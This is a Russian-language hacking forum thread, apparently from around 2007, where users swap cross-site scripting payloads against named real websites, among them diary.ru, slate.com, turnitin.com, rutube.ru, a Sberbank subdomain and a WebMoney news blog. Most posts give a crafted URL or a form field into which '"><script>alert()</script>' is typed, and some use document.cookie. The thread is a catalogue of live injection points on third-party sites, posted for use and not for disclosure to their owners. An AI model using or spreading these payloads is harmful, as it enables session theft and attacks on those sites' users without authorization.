Сообщений в теме: 48

[MoLoToK]

Выкладываем XSS

http://diary.ru/list/?sort=&ord=&show=&fgroup_id=&username=&comm"><script>alert("XSS")</script>

http://www.slate.com/id/2174677/?GT1="><script>alert()</script>

http://knigi.iskal.ru/istorija/scarlet.html?p=24"><script>alert()</script>

[MoLoToK]

Поддомен спорт экспресс, жаль что ничего сделать нельзя

http://extreme.sport-express.ru/search?text=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=9&y=">
<script>alert()</script>

[$iD]

XSS WM-аукциона ;)

Скрытый текст

http://wmauction.org.ru/shop.php?go=wins&v=WMZ<script>alert(document.cookie)</script>

[Root-access]

Скрытый текст

]]>http://search.prm.ru...3...&where=perm]]>

Скрытый текст

]]>http://www.narkotiki...h...amp;m=p&f=s]]>

Скрытый текст

]]>http://www.breakdanc...=...()</script>]]>

Скрытый текст

]]>http://www.breakdanc...=...()</script>]]>

Скрытый текст

]]>http://www.winvestco...%...e)</script>]]>

Скрытый текст

]]>http://webscript.ru/...e="...</script>]]>

А приватные сюда стоит скидывать, как думаете?)

[Root-access]

Энфикс, с чего же это пассивные?!)))

ENFIX (14.11.2007, 15:10) писал:

>http://webscript.ru/...><script>alert()%3C/script%3E
Чет не пашет..
>А приватные сюда стоит скидывать, как думаете?)
Приватные пассивные XSS? O_o

Вебскрипт:

]]>http://webscript.ru/...e="...</script>]]>

[MoLoToK]

http://www.bluesky.ru/index.php?act=country&country_id=%22%3E%3Cscript%3Ealert
('XSS%20by%20MoLoToK')%3C/script%3E

[MoLoToK]

http://sobaka.sobaka.ru/index.php?path=%22%3E%3Cscript%3Ealert('by%20MoLoToK')%3C/script%3E

[MoLoToK]

megashara

http://megashara.com/search.php?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x
=21&y=8

очень странно ещё недели 2 назад не было
---

Bubblesnaps.com

В правом верзнем углу в формах e-mail и password вводим код
"><script>alert('XSS')</script>

---

http://www.writers.net/resources.php

в search for books вводим "><script>alert('XSS')</script>

---
turnitin.com

http://www.turnitin.com/quote_request.asp?account_type=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

[MoLoToK]

Detstvo.ru

http://forum.detstvo.ru/showflat.php?Number=128342%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

http://detstvo.ru/auth/login.php?redirect=http%3A%2F%2Frecipe.detstvo.ru%2Fsearch%2F%3Fpath%3D%252
Findex.html%26txt%3D%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E%
26cooking_time_cat%3D0%26cooking_time%3D%26calorie_cat%3D0%26calorie%3D%26food_type%3D0%26x%3D0%26y
%3D0%26cooking_way%3D0%26diet%3D0%26cur_section%3D1%26sorttype%3D1

[Jinn]

http://www.kimep.kz/search/?text=%3Cscript%3Ealert('xss');%3C/script%3E&x=0&y=0

[MoLoToK]

http://www.getjar.com/products/11966/EQO

жмём на [write a review], вылезает окно, в поле operator

"><script>alert('XSS')</script>

жмём enter и видем alert

[$iD]

http://urb.sbrf.ru/index/ru?act=search&qs=666%22%3E%3Ch1%3EFind%20by%20Defc0n%3C/h1%3E%3C
script%3Ealert('}{SS%20by%20Defc0n')%3C/script%3E%3C!--

[rand.0m]

http://www.securitylab.ru/news/0/?"><script>eval(unescape("alert(document%25%32%65cookie)"));
</script><

https://newsblog.wmtransfer.com/asp/search.asp?keyword=" onfocus="js:alert(document.cookie)"

кликаем по полю поиска..

[MoLoToK]

Heroes of Might and Magic
]]>https://secure.ubi.c...ogin/Login.aspx]]>

"><script>alert('XSS')</script>

в username и password

[Root-access]

Скрытый текст

tfile.ru

Заходими в поиск:

]]>http://tfile.ru/forum/asearch.php]]>

Набираем:

"><script>alert();</script>"

[MoLoToK]

http://www.plast.org.ua/pages/news_add.php

в поле ваш особистий код пишем "><script>alert('XSS')</script>
и жмём отримати код
емейл пишем любой

[MoLoToK]

Kulichki.com
Очень долго искал хоть какие-то уязвимости на этом сайте

http://phonecards.kulichki.com/reg/forgot-password.php?login=%22%3E%3Cscript%3Ealert%28
%27XSS%27%29%3C%2Fscript%3E

[AFoST]

Сайт НЛПерцев.
]]>http://www.nlpcafe.r...%.../)</script>]]>

[Jinn]

список проксей :-)

http://nntime.com/index.php?start=1%3Cscript%3Ealert(%27Error%20:-)%27);%3C/script%3E

Может еще можно чего там найти,хз не копал.
P.S. Может стоит "поднять" тему?

[MoLoToK]

http://www.gyre.org/subscribe/index.php

"><script>alert('XSS')</script>

[Pogant]

 http://www.rss.zelenkov.net/rss_view_channel.php?rss_url=%3Cscript%3Ealert(%22found%20by%20
Pogant%22);%3C/script%3E

[MoLoToK]

XSS на Rutube.ru

http://rutube.ru/login.html

"><script>alert('XSS')</script>

[MoLoToK]

XSS на Инетболе
Как обычно, месяц на сайте тусю и только щас XSS нашёл

http://inetball.ru/tt_placeCountries.asp?trID=8511&trName="><script>alert('XSS by MoLoToK')</script>

думаю пора темку прикрепить

[MoLoToK]

в поле входа, е-мейл и пароль вместе

http://www.drtuning.ru/account/

"><script>alert('XSS')</script>

[MoLoToK]

Активная XSS, админ жжот, банит по ИПу
]]>http://www.sporu.net/new/]]>